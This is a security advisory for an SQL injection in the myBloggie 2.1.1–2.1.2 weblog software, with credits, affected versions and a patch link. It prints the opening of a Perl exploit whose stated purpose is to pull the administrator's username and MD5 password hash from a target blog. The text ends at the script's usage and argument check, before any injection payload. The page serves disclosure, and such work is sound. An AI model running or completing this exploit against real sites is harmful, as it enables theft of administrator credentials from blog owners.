Summary
myBloggie is "considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP and mySQL, web most popular scripting language and database system enable myBloggie to be installed in any web servers".

The following exploit will try to retrieve password HASH used by administrator of the myBloggie product.

Credit:
The information has been provided by Alberto Trivero.
The original article can be found at: http://www.packetstormsecurity.org/0505-advisories/codebug-9.txt
The original article can be found at: http://www.codebug.org/index.php?subaction=showfull&id=1115310052&ucat=6&

Details
Vulnerable Systems:
* myBloggie version 2.1.1
* myBloggie version 2.1.2

#!/usr/bin/perl -w
#
# SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
# This exploit show the username of the administrator of the blog and his password crypted in MD5
# Related advisories: (Italian) http://www.codebug.org/index.php?subaction=showfull&id=1115310052&ucat=6&
# Patch: http://mywebland.com/forums/viewtopic.php?t=180
# Coded by Alberto Trivero and Discovered with CorryL

use LWP::Simple;

print "\n\t =\n";
print "\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\n";
print "\t= Alberto Trivero - codebug.org =\n";
print "\t =\n\n";

if(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) {
print "Usage:\nperl $0 [full_target_path] [version: 2.1.1 OR 2.1.2]\n\nExample:\nperl $0 http://www.example.com/mybloggie/ 2.1.1\n";
exit(0);
}